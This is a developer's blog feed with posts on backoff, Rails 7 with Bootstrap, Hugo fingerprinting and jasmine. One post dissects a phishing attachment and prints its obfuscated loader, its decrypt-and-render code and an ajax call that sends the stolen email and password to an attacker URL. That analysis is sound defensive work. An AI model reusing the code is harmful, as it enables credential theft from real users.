Updates from kmitov

  • kmitov 2:05 pm on November 6, 2022

    Backoff strategy 

    I had never wondered what it is called when you attempt to call a server and this fails, then you attempt again two seconds later and it fails, and then 4 seconds later, and then 8, and so on. Clearly it is exponential in nature, but I never gave much thought to “exponential what”.

    Turns out this is called a backoff strategy. You get to back off.

    Once we have a name, we have power over it. We can build a class or a method that is properly called a backoff strategy.

    And of course, as with everything else, there is a “javascript framework” for backoff strategies – https://github.com/kenyipp/backoff-strategies. Yes, there is a javascript framework for everything… 😀

    There is also a Wikipedia article on the subject – https://en.wikipedia.org/wiki/Exponential_backoff

    Good. Learned something today. Now I can explain it, because I have a name and I have power over it.
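    The idea is simple enough to sketch in a few lines of JavaScript. This is my own minimal illustration, not the API of the backoff-strategies package linked above; `operation` stands in for any async call that may fail.

```javascript
// Minimal exponential backoff sketch: retry a failing async operation,
// doubling the wait after every failure (2s, 4s, 8s, ...).
async function withExponentialBackoff(operation, { retries = 5, baseDelayMs = 2000 } = {}) {
  for (let attempt = 0; attempt < retries; attempt++) {
    try {
      return await operation();
    } catch (error) {
      if (attempt === retries - 1) throw error; // out of attempts, give up
      const delayMs = baseDelayMs * 2 ** attempt; // 2000, 4000, 8000, ...
      await new Promise((resolve) => setTimeout(resolve, delayMs));
    }
  }
}
```

Real-world versions usually add a maximum delay and some random jitter so that many clients do not retry in lockstep.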

     
  • kmitov 9:09 am on May 30, 2022

    Esnaf 

    Go and see the product at https://esnaftoys.com/products/nordic-fox-wooden-magnetic-toy-design

    (image: Nfox_3d_toy)

     
  • kmitov 9:01 am on April 6, 2022
    Tags: ui, ux

    How a bad UI message prevented us from resolving a 5-day feature downtime

    This article is about a UI message in our platform that was confusing enough to prevent us from resolving a 5-day downtime of a feature. We could have resolved it much faster, but the confusing message made things worse. I hope that UI experts and engineers (like us) can benefit and get an insight into how some things confuse users.

    Context

    Our https://www.buildin3d.com service for visualizing animated and interactive 3D assembly instructions is used by one of the well known robotics education platforms https://www.fllcasts.com. At FLLCasts there are instructions of LEGO robots and mission models from the FIRST LEGO League robotics competitions. Here is an example instruction – https://www.fllcasts.com/materials/1393-bag-12-helicopter-with-food-package-first-lego-league-2021-2022-cargo-connect

    On the left you see the message “Downloading initial steps…”

    Problem

    5 days ago a user wrote a ticket to us with a question:

    “Why can’t I download the instructions?”.


    I naturally responded to the user: “Well, you can’t, because this is how we’ve built them to work. They open in the browser and cannot be downloaded. What are you trying to do anyway?” (oh, my ignorance)

    The user replied in the ticket

    “I just want to build them.”

    Obviously there was a great miscommunication between us. The user was trying to build the instructions, but was using the term “Download”. Why? Well, because we taught them so.

    5 days later I found out the following. Some of the instructions were not working. When users visited them, we, as “ignorant engineers”, showed a message saying “Downloading initial steps…” while the instruction was loading. In our engineering minds we really were downloading the instruction to the browser: some of the steps of the instruction were downloaded from the server to the client, which is the browser.

    When the user got in touch with us he said: “Hey, why can’t I download the instructions?”
    When asked this question, I assumed the user wanted to download the instructions to their file system and open them from there in offline mode, which is generally what “Download” means. I made a really wrong assumption about what the user was trying to do. He was trying to load and view the instructions, not to “Download” them. But we were telling him that we were “Downloading” the instructions, so he naturally used this term.

    The implications

    For 5 days about 5-6% of our instructions were not working correctly. We could have resolved this much faster if I had paid a little more attention to what the user was asking in the ticket, or if the message had been “Loading initial steps…” instead of “Downloading initial steps…”

    You learn something every day.

     
  • kmitov 10:38 pm on January 13, 2022
    Tags: bootstrap, cssbundling-rails, jsbundling-rails, rails 7

    Rails 7 with bootstrap 5 by cssbundling-rails with dart-sass and jsbundling-rails with esbuild. No webpack and webpacker and a salt of Stimulus 

    Today I put on my “new to Rails hat” and I decided to start a new Rails 7 project using the latest two new sharp knives that we have with Rails 7 to get a job done.

    The Job To Be Done is: Demonstrate Bootstrap 5 examples of a Toast in a Rails 7 project.

    This is a simple example of a popular Bootstrap 5 component that has both css and js involved. My goal is to build a website that will show a button and when the button is clicked a Toast will be visualised as it is in https://getbootstrap.com/docs/5.0/components/toasts/#live

    Provide sharp knives and the menu is omakase

    These are two points of the Rails doctrine. The menu is omakase, which means that we get good defaults for the tools we use. We are also given sharp knives to use – cssbundling-rails, jsbundling-rails, Stimulus, dart-sass, esbuild.

    The process

    I would like to bundle bootstrap 5 in the application. One of the options is to take bootstrap from npm, and that is the option I will demonstrate. Note that this might not be the right choice for you.

    NPM version

    Make sure you have npm 7.1+. I spent more than an hour chasing an error that turned out to be caused by my npm version being 6.X.

    $ npm --version

    Rails 7 project

    # We pass in the option --css bootstrap that will configure most things for us
    $ rails _7.0.1_ new bProject --css bootstrap
    # enter the project folder
    $ cd bProject

    Everything is installed. You have all the dependencies for bootstrap, and there is a node_modules folder containing node modules like bootstrap.

    Bundling the CSS

    The cssbundling-rails gem is installed by default in the Gemfile.

    There is an app/assets/stylesheets/application.bootstrap.scss that imports the bootstrap css.

    Its content is:

    @import 'bootstrap/scss/bootstrap';

    We will use sass (again from npm) to build this .scss file. There is a script in the package.json:

    {
      "name": "app",
      "private": "true",
      "dependencies": {
        "@hotwired/stimulus": "^3.0.1",
        "@hotwired/turbo-rails": "^7.1.0",
        "@popperjs/core": "^2.11.2",
        "bootstrap": "^5.1.3",
        "esbuild": "^0.14.11",
        "sass": "^1.48.0"
      },
      "scripts": {
        "build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",
        "build:css": "sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules"
      }
    }

    The script build:css will take the app/assets/stylesheets/application.bootstrap.scss and will produce an app/assets/builds/application.css

    The file application.css is the one that our application will be using. It is referred to in application.html.erb as
    <%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>

    <!DOCTYPE html>
    <html>
      <head>
        <title>BProject</title>
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <%= csrf_meta_tags %>
        <%= csp_meta_tag %>
    
        <%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
        <%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
      </head>
    
      <body>
        <%= yield %>
      </body>
    </html>

    The live reload of CSS

    In order to change the css and have it live reload, we must start sass with the --watch option:

    $ sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules --watch

    But don’t run this directly – there is a helper script that handles it for us, which we will execute at the end of the article: ./bin/dev

    Bundling the JavaScript

    The jsbundling-rails gem is installed in the Gemfile.

    There is an app/javascript/application.js that imports bootstrap

    // Entry point for the build script in your package.json
    import "@hotwired/turbo-rails"
    import "./controllers"
    import * as bootstrap from "bootstrap"

    The application.js is bundled with esbuild, and the command is in the package.json:

    # part of package.json
    "build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",

    The result is produced in app/assets/builds

    The result is referred to by the Rails Asset Pipeline and included in the HTML by calling javascript_include_tag "application" as in

    <!DOCTYPE html>
    <html>
      <head>
        <title>BProject</title>
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <%= csrf_meta_tags %>
        <%= csp_meta_tag %>
    
        <%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
        <%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
      </head>
    
      <body>
        <%= yield %>
      </body>
    </html>

    Create a new controller

    An initial controller that will render the home screen containing the button.

    # app/controllers/home_controller.rb
    $ echo '
    class HomeController < ApplicationController
    
      def index
      end
    end
    ' > app/controllers/home_controller.rb

    Create a views folder

    # views folder
    $ mkdir app/views/home

    Create the view

    It contains a button and a toast.

    $ echo '
    <!-- app/views/home/index.html.erb -->
    <h1>Title</h1>
    <div data-controller="toast">
      <button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
    </div>
    
    <div class="position-fixed bottom-0 end-0 p-3" style="z-index: 11">
      <div id="liveToast" class="toast hide" role="alert" aria-live="assertive" aria-atomic="true">
        <div class="toast-header">
          <strong class="me-auto">Bootstrap</strong>
          <small>11 mins ago</small>
          <button type="button" class="btn-close" data-bs-dismiss="toast" aria-label="Close"></button>
        </div>
        <div class="toast-body">
          Hello, world! This is a toast message.
        </div>
      </div>
    </div>
    ' > app/views/home/index.html.erb

    Note the code:

    <div data-controller="toast">
      <button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
    </div>

    Here we have a ‘data-controller’ attribute in the div element and a ‘data-action’ attribute in the button element.
    This is how we will connect Stimulus JS as a javascript framework to handle the logic for clicking on this button.

    Configure the routes

    When we open “/” we want Rails to call the home#index method that will return the index.html.erb page.

    $ echo '
    # config/routes.rb
    Rails.application.routes.draw do
      # Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
    
      # Defines the root path route ("/")
     root "home#index"
    end' > config/routes.rb

    Create a new Stimulus controller

    We will use Stimulus, the small preferred framework in Rails for doing JavaScript. When the button in the above HTML fragment is clicked, the show() method in the controller will be called.

    # Use the helper method to generate a stimulus controller named "toast"
    $ bin/rails generate stimulus toast
    
    # create the content of the controller
    $ echo '
    // app/javascript/controllers/toast_controller.js
    import { Controller } from "@hotwired/stimulus"
    import { Toast } from "bootstrap"
    
    // Connects to data-controller="toast"
    export default class extends Controller {
    
      connect() {
      }
    
      show() {
        const toastElement = document.getElementById("liveToast")
        const toast = new Toast(toastElement)
        toast.show();
      }
    }
    ' > app/javascript/controllers/toast_controller.js

    Start the dev servers for rails, jsbundling-rails and cssbundling-rails

    $ ./bin/dev

    Visit localhost:3000

    There is a button, and when you click it a toast appears.

     
  • kmitov 1:25 pm on December 19, 2021
    Tags: hugo, jamstack

    Classic challenge, new tool – addressing browser image caching issues with Hugo fingerprinting 

    Have you ever been on a support call with a service/vendor and they tell you – “Please, clear your browser cache!”

    Or you’ve been on the development side of a website: you upload a new image, only for users to keep reporting that they still see the old one. Then you have to ask all of your users to refresh their browsers, which is not an easy thing to do.

    It’s a classic challenge with caching of assets like images, and it generally has only one solution that works in all cases.

    Recently we had the same challenge with the new website at BeMe.ai and I thought: “Let’s explore a tool from the perspective of this challenge”. The tool is a static website generator called Hugo and the job to be done is to address the image caching challenge so that our parents of autistic children always see the latest image on our website developed by our illustrator – Antonio.

    (image of a parent and an autistic child. Used at https://beme.ai)

    In this article I will go through what the challenge is, why there is a caching challenge, how it could be addressed without any framework, with Rails (Ruby on Rails) and with Hugo. My hope is to give you a good understanding of how the Hugo team thinks, in what terms and in what direction. This is not a Hugo tutorial, but more how I’ve focused on one challenge and tried to address it with Hugo.

    The challenge of browser caching

    When browsers visualise a webpage with images, they request the images from the server where the website is hosted. Images require much more bandwidth than text, and next time you visit the same website the browser would have to request the same image again, which again requires traffic. Images do not change often on websites, so browsers prefer to cache the image – it is saved in the local storage of your device, be it mobile or desktop. Next time you open the same webpage, the browser will not make a request to the server to get the image, as there is a copy of it already in your local storage.

    The question here is: how does the browser know that the image in its local storage is the same image as the one on the server? What if you’ve changed the image in the meantime and there is a new version on the server? That is what happened to us with an image that Antonio developed.

    The answer is remarkably simple: The browser knows if the image in its local storage and the image on the server are the same if they have the same “url/name”.
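    In pseudo-JavaScript terms, the browser’s decision can be sketched as a cache keyed by URL. This is a deliberate simplification of mine – real browsers also consult HTTP headers such as Cache-Control and ETag – but the key insight holds: same URL, and the cached copy wins.

```javascript
// Simplified sketch of a browser image cache keyed by URL.
// Real browsers also consult HTTP headers (Cache-Control, ETag, ...),
// but the key insight is: same URL => the cached copy is used.
const localCache = new Map();

function fetchImage(url, requestFromServer) {
  if (localCache.has(url)) {
    return localCache.get(url); // old copy, no server request
  }
  const image = requestFromServer(url); // new URL => real request
  localCache.set(url, image);
  return image;
}
```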

    Let me illustrate a scenario

    A week ago:
    A parent visited our website. The browser visualised the image called – parent-with-child.png
    It stores a copy of parent-with-child.png in its local storage.

    Image from BeMe.ai that had the wrong dashboard on the phone

    Two days ago:
    Antonio developed a new image of the parent and the child and we uploaded it at BeMe.ai. From now on the image located on parent-with-child.png is the second version.

    Image improved by Antonio to have the correct dashboard on the phone. Taken from the BeMe.ai website.

    Today:
    The same parent visits the website again. The browser asks the server what’s on the page, and the server responds that the page contains a link to parent-with-child.png. As the browser already has a local copy of parent-with-child.png, it will not request this resource from the server. It will just use the local copy. This saves bandwidth and the site opens faster. It’s a better experience – but it is the old image.

    Which one will be shown to the user?

    What really makes this problem difficult is that different browsers behave in different ways. The internet has tried many solutions, including different headers in the HTTP protocol, to address this challenge. Still, there are times when the user will just not see the new version of the image. It can drive you really crazy, as some users will see the new version and some the old.

    How big of a challenge is this?

    Technically it is not a great challenge, yet I’ve seen experienced engineers miss this small detail. I’ve missed it a couple of times myself. Every such case is a load on the support channel of your organisation and on engineering. So better to avoid any caching issues at all.

    What’s the solution?

    There are many solutions, but only one works across all browsers and devices and across all versions of the HTTP protocol that powers the internet.
    The solution is remarkably simple:
    The browser looks at the URL of the image. If there is a local copy stored for this URL, the browser uses the local copy. If there is no local copy for the URL, the browser requests the image from the server.

    All we have to do, next time we change the parent-with-child.png image, is to upload it with a new file name. parent-with-child-v2.png is probably a good new name.
    Other good names include:

    1. parent-with-child-2021-12-19-13-15.png (it has the date and time on which it was uploaded)
    2. parent-with-child-with-an-added-book.png (it is different and descriptive)
    3. parent-with-child-1639913778.png (it has in its name the time in seconds since the UNIX epoch when the file was created)
    4. parent-with-child-2f11cf241d023448c988c3fc807e7678.png (it has an MD5 hash code)
    5. parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png (it has a SHA256 sum as its name)

    All it takes to resolve the browser caching challenge is to change the name of the picture when you upload it and to change it to something unique.

    That’s all it takes – no need for frameworks and fingerprinting and assets precompilation and all the other things that follow in the article.

    All it takes to address and successfully resolve any browser image caching issue is to change the name of the image next time you upload a new version of it.

    Why does the simple solution not work?

    I think it does not work because we are humans and we forget. We create a new version of the parent-with-child.png image and we forget to change the name of the image. That’s it. We just forget.

    Computers, on the other hand, are good at reminding us of things and at doing the dull work that we often forget to do. What we can ask the computer to do is to create a new name for the image every time we upload a new version. Enter fingerprinting.

    Fingerprinting

    Fingerprinting is the process of looking at the bits of the image (or generally of any file) and calculating a checksum. The checksum is practically unique for every file. After we calculate the checksum we add it to the name of the file.

    Example:

    1. We upload the original parent-with-child.png image and the computer calculates a checksum: a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56. Then it sets the name of the file on the server to parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png
    2. We upload a new version of the parent-with-child.png image and the computer calculates its checksum, which is cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b. Then the computer sets the name of the file on the server to parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png
    3. We upload a new version, a new checksum is calculated and a new name is generated. This is done for every new image.

    How checksums are calculated is a topic for another article. Computers are good and fast at calculating checksums. Humans are terrible – it would probably take us days of manual calculation to come up with the checksum of an image file by hand.

    What’s difficult with fingerprinting?

    The difficult part is not the fingerprinting itself. What’s difficult is finding every HTML page on your website where the image
     parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png is used and replacing this name with parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png.

    This means every occurrence on the website of

    <img src="https://www.beme.ai/images/parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png">

    should be updated to contain the new url

    <img src="https://www.beme.ai/images/parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png">

    The good thing is that computers are also good at this – searching through the content of many files and replacing specific parts of this file with new content.
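    The replace step itself is tiny once you have both names. A sketch of mine in JavaScript, operating on a page's HTML as a string:

```javascript
// Sketch of the replace step: swap every reference to the old
// fingerprinted file name for the new one in a page's HTML.
function replaceImageReferences(html, oldName, newName) {
  return html.split(oldName).join(newName); // replaces all occurrences
}
```

The real work in a deployment pipeline is running this over every generated page, which is exactly what the tools below automate.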

    What needs to be implemented then? What’s the process?

    What we need from our process of deploying new versions of images to our website is the following:

    1. Ask our illustrator, Antonio in our case, to develop a new version of the parent-and-child.png image.
    2. Put the new picture on our website and have the computer magically:
        – calculate a new checksum of the image and change the name of parent-and-child.png, i.e. fingerprint the image
        – find all references on our website to the previous version of the image and replace each reference with the new name of the image
       

    Pure Bash and Linux implementations

    Linux provides simple tools such as sha256sum, grep, sed and mv, and with a combination of them we can come up with a pretty decent solution. I am not going to do that, because we might then decide it is a good idea. That path leads to reinventing the wheel with different bash scripts all over the infrastructure and code, and there is no need for it. If you are already on this path I cannot stop you, but I don’t want to be the one guiding you along it. Been there, done that, and after many years I realised it was not a very wise decision.

    Doing it the Rails way

    I am a big fan of Rails. Rails addresses the browser image caching challenge with something called the “Asset Pipeline”.

    What we do in Rails is use the image_tag method in all HTML pages. The syntax below is an ERB template, where we use “<% %>” inside the HTML that is processed on the server side.

    <div class="container">
      <!-- Logo -->
      <%= link_to image_tag("logo.png", alt: "BeMe.ai", class: "img-fluid", width:55), main_app.root_path,{ class: "navbar-brand" }%>
      <!-- End Logo -->

    Note that here we use the name “logo.png” and the image_tag method handles everything for us. The generated HTML is:

    <div class="container">
      <a class="navbar-brand" href="/"><img alt="BeMe.ai" class="img-fluid" width="55" src="/assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png"></a>

    Note how the file that we referred to as logo.png in the template becomes /assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png in the HTML delivered to the client.

    Rails has done everything for us – fingerprinting and replacing. Thanks to the Asset Pipeline in Rails we’ve successfully resolved the browser image caching challenge.

    Doing it the Hugo way

    Hugo is different from Rails. Hugo is a static website generator and it thinks in terms different from Rails. Yet, it has a Hugo Pipeline. Before we enter into the Hugo Pipeline it is good to have a small introduction to Hugo.

    Hugo allows authors to create markdown documents

    Hugo thinks about the authors. It makes it possible to include team members in developing the content of the website, and they do not have to be team members who know how to start & deploy Rails applications. Which is good.

    This means that authors could create a markdown document like this

    # Basic misconceptions about autism
    
    In this blog post we will talk about basic misconceptions about autism.
    
    Let's start with this picture of an autistic child and a parent
    
    ![Picture of misconceptions](https://www.beme.ai/parent-and-child.png)
    
    ...

    As a markdown document, this is something whose content someone with medical knowledge could develop; there is no need for someone with both medical and HTML/Rails/Web Development expertise (and such people are difficult to find).

    Now the author has added a new version of the parent-and-child.png image, and it again has the name parent-and-child.png. We should somehow ask Hugo to add a fingerprint and replace all references to the image with references to the new one.

    Hugo in 1 paragraph – content, layouts, markdown hooks

    In Hugo the content developers write the content in Markdown format. The engineer creates the HTML layouts. Hugo takes the layout and adds the content to it to generate the HTML page that is visualised to the user. Every time a Markdown element is converted to HTML, Hugo calls a Markdown hook. The job of the hook is to convert the Markdown element to HTML. The logic of a hook is implemented in the Go Template Language, and there are default implementations of hooks for every Markdown element. We can override the default implementation of the hook that converts the Markdown containing the image parent-and-child.png to HTML by creating a file layouts/_default/_markup/render-image.html.

    Fingerprinting of content images in Hugo with the Hugo Pipeline

    Fingerprinting of content images is not enabled by default. We should be explicit that we want it. Hugo Pipeline handles the rest with methods like “fingerprint”

    Here is the content of layouts/_default/_markup/render-image.html

    <!-- layouts/_default/_markup/render-image.html -->
    
    {{/* Gets a resource object from the destination of the image that is parent-with-child.png */}}
    {{/* The parent-with-child.png image is specified in the markdown and must be available in the  */}}
    {{/* asset folder */}}
    {{ $image := resources.GetMatch .Destination }}
    
    {{/* Calculate the fingerprint and add it to the name; Permalink is the full URL of the resulting file */}}
    {{ $image := ($image | fingerprint).Permalink }}
    
    <img src="{{ $image }}"/>

    When processed Hugo will generate an index.html file that contains:

    <img src="http://example.org/parent-and-child.a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"/>

    Summary

    Image fingerprinting resolves the browser caching challenge in 100% of cases.
    It is a topic that is often overlooked, both by content developers and by engineers.
    Without it we often end up with users seeing the wrong images and hearing “Clear your browser cache and refresh again.”
    It is easy to address with many different available tools.

    We’ve looked at how to implement it with
      – Linux
      – Rails
      – Hugo
     
    Asking users to “clear browser cache” and “refresh a website” is a failure of the process and the engineering organisation. It should not happen, and I am sure we could be better than this.

     
  • kmitov 6:39 pm on December 18, 2021
    Tags: design   

    Be brave, be bold… but not so much – a thing we learned from designing a single page website with a video 

    This content is password protected. To view it please enter your password below:

     
  • kmitov 11:30 am on November 26, 2021
    Tags: apple, payment

    Unsettled: The Future of Apple’s 30% Cut (by Fastspring) 

    I tried to do a quick summary for our team about what is coming out of the Epic vs Apple case. After looking at a few different resources, I think the following webinar gives a good understanding of what is happening.

    (source https://fastspring.wistia.com/medias/tutvwsihof)

    Current status summary

    1. There is a new possible “Web flow” that opens a lot of possibilities that previously were not possible.
    2. You are more flexible to target users in specific ways.
    3. We have unlocked optimization for customer lifetime value – retention, cross-sell.
    4. The future might be: enter the app ecosystem, then use a web flow outside of Apple for cross-sell, sales and communication.
    5. There might be fewer “Paid” apps going forward. There will be a move to “Subscription”.
    6. Change is more likely to come from regulatory and government efforts than from court rulings.
     
  • kmitov 7:16 am on November 16, 2021

    How they tried to compromise our CEO and what a phishing email contains 

    Are you curious about what is inside those phishing emails and how they try to steal your password?

    This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.

    A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.

    Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.

    Content of phishing email

    This is the email. It has an attachment. Looks kind of real.

    This is what the attachment looks like:

    What could you do:

    1. Check the sender
    2. Ask your CTO/Admin/Security or somebody with good technical knowledge whether this email is legit.
    3. Don’t click on attachments

    The attachment is an HTM file

    This file opens in the web browser on Microsoft Windows machines. Let’s see the content of this file when opened with a text editor:

    A sample of it is:

    <script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>

    This file contains an HTML document. HTML is the format of webpages, and once you click on this file it will open in your web browser and the browser will execute it.

    Note: Don’t click on such attachments.

    What is unescape?

    The unescape here means that the string

    “%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..” is encoded.

    ‘unescape’ is a function that reverses the encoding. It is technical, but in the end the goal is to make sure this file can be read by all browsers.
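    You can reproduce the decoding yourself in a browser console or in Node, where the legacy unescape function is still available (decodeURIComponent is its modern replacement for this kind of percent-encoding). A short example of mine, not taken from the attachment:

```javascript
// '%3C' decodes to '<', '%73' to 's', and so on – percent-encoded ASCII.
const encoded = "%3C%73%63%72%69%70%74%3E";
console.log(unescape(encoded)); // "<script>"
```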

    The result of unescaping the content looks like:

    <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
      <script>
      function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
          var obj_json = JSON.parse(encrypted_json_string);
          var encrypted = obj_json.ciphertext;
          var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
          var iv = CryptoJS.enc.Hex.parse(obj_json.iv);   
          var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
          var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
          return decrypted.toString(CryptoJS.enc.Utf8);
      }
      document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE

    Here is what happens in the code in simple terms:

    There is an encrypted text called “ciphertext”, and this ciphertext is decrypted and executed. This happens on the last line of the fragment above, where document.write renders the decrypted content.

    So the phishing mail contains an attachment, the content of this attachment is ‘escaped’, and the ‘escaped’ content is encrypted.

    What’s the content of the ciphertext?

    The ciphertext contains a web page that your browser will render. It looks like a real web page – a real Microsoft 365 login page.

    Here is a screenshot:

    Here, where you see “pesho@gmail.com”, you will see your own email address.
    This makes the page look more real to you.

    The summary so far: the phishing email contains an attachment with executable HTML code; that code is escaped, the escaped content is encrypted, and the decrypted content is an HTML page that looks like the Microsoft login page.

    What happens when you fill your email and password?

    There is a fragment of the code of the page that looks like this:

    count = count + 1
    $.ajax({
      dataType: 'JSON',
      url: 'https://sintracoopmn.com.br/process.php',
      type: 'POST',
      data: {
        email: email,
        password: password,
        detail: detail,
      },

    This code will send your email and password to the following web address: https://sintracoopmn.com.br/process.php
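In plain terms, the $.ajax call above builds an HTTP POST with the credentials as form-encoded data. Here is a sketch of just the request body; the values are the made-up ones from this article, and nothing is actually sent anywhere.

```javascript
// Sketch of the request body the phishing page builds.
// The values are hypothetical; no request is made here.
const body = new URLSearchParams({
  email: 'pesho@gmail.com',
  password: 'abcd1234',
  detail: 'browser and session details collected by the page',
});

// This is what would travel to the attacker's process.php endpoint.
console.log(body.toString());
```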

    Let’s try it.

    I add the username pesho@gmail.com with password ‘abcd1234’

    Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but it will also log me in to my Office 365 account.

    So I will not even understand that I was compromised.

    What can you do?

    Add two-factor authentication.

    That’s the easiest, most secure solution. Add two-factor authentication that will send you an SMS every time you log in, or that will require you to use an authenticator app.

    If you haven’t done it already, I would advise you to do it now.

     
  • kmitov 7:13 am on November 10, 2021 Permalink |

    Migrating to jasmine 2.9.1 from 2.3.4 for teaspoon 

    We finally decided it is probably time to try to migrate to jasmine 2.9.1 from 2.3.4

    There is an error that started occurring randomly, and before digging down, investigating it, and in the end finding out that it was probably the result of a wrong version, we decided to try to get up to date with jasmine.

    The latest jasmine version is 3.x, but 2.9.1 is already a huge step from 2.3.4.

    We will try to migrate to 2.9.1 first. The issue is that the moment we migrated, this error appeared:

    'beforeEach' should only be used in 'describe' function

    It took a couple of minutes, but what we found out is that fixtures are used differently in the two versions.

    Here is the difference and what should be done.

    jasmine 2.3.4

    fixture.set can be called both in the describe and in the beforeEach:

    // This works
    // fixture.set is in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);
      beforeEach(function() {
      })
    })
    // This works
    // fixture.set is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })

    jasmine 2.9.1

    fixture.set can be called only in the describe and not in the beforeEach:

    // This does not work as fixture.set is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })
    // This works
    // fixture.set is in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);
      beforeEach(function() {
      })
    })
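A toy model of why jasmine 2.9.1 raises this error. The guess here (an assumption, not verified against teaspoon’s source) is that fixture.set registers a beforeEach hook of its own, and jasmine 2.9 only allows beforeEach while a describe body is executing. The describe/beforeEach/fixture below are minimal stand-ins, not the real jasmine API:

```javascript
// Minimal stand-ins to illustrate the 2.9.1 restriction.
let inDescribeBody = false;

function describe(name, body) {
  inDescribeBody = true;
  body();
  inDescribeBody = false;
}

function beforeEach(fn) {
  // jasmine 2.9 rejects beforeEach outside a describe body.
  if (!inDescribeBody) {
    throw new Error("'beforeEach' should only be used in 'describe' function");
  }
}

// Assumption: fixture.set registers its own beforeEach hook internally.
const fixture = {
  set(html) {
    beforeEach(function() { /* would load the fixture into the DOM */ });
  },
};

// Works: fixture.set runs while the describe body is executing.
describe("feature 1", function() {
  fixture.set(`<div id="the-div"></div>`);
});

// Fails: a beforeEach callback runs long after the describe body has
// finished, so calling fixture.set there hits the error from the post.
try {
  fixture.set(`<div id="the-div"></div>`);
} catch (e) {
  console.log(e.message);
}
```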
     
  • kmitov 8:57 am on October 8, 2021 Permalink |
    Tags: amazon-s3

    Sometimes you need automated test on production 

    In this article I am making the case that sometimes you just need to run automated tests against the real production and the real systems with real data for real users.

    The case

    We have a feature on one of our platforms:

    1. User clicks on “Export” for a “record”
    2. A job is scheduled. It generates a CSV file with information about the record and uploads it to S3. Then a presigned URL valid for 72 hours is generated, and an email is sent to the user with a link to download the file.

    The question is how do you test this?

    Confidence

    When it comes to specs, I like to develop automated specs that give me the confidence that I deliver quality software. I am not particularly religious about what kind of spec it is, as long as it gives me confidence and does not stand in my way by being too fragile.

    Sometimes these specs are model/unit specs, many times they are system/feature/integration specs, but there are cases where you just need to run a test on production against the production db, production S3, production env, production user, production everything.

    Go in a System/Integration spec

    A spec that would give me confidence here is one that simulates the user behavior with Rails system specs.
    The user goes and clicks on “Export”, and I check that we’ve received an email and that this email contains a link:

      scenario "create an export, uploads it on s3 and send an email" do
        # Set up the record
        user = FactoryBot.create(:user)
        record = FactoryBot.create(:record)
        ... 
    
        # Start the spec
        login_as user
        visit "/records"
        click_on "Export"
        expect(page).to have_text "Export successfully scheduled. You will receive an email with a link soon."
    
        mail_html_content = ActionMailer::Base.deliveries.select{|email| email.subject == "Successful export"}.last.html_part.to_s
        expect(mail_html_content).to have_xpath "//a[text()='#{export_name}']"
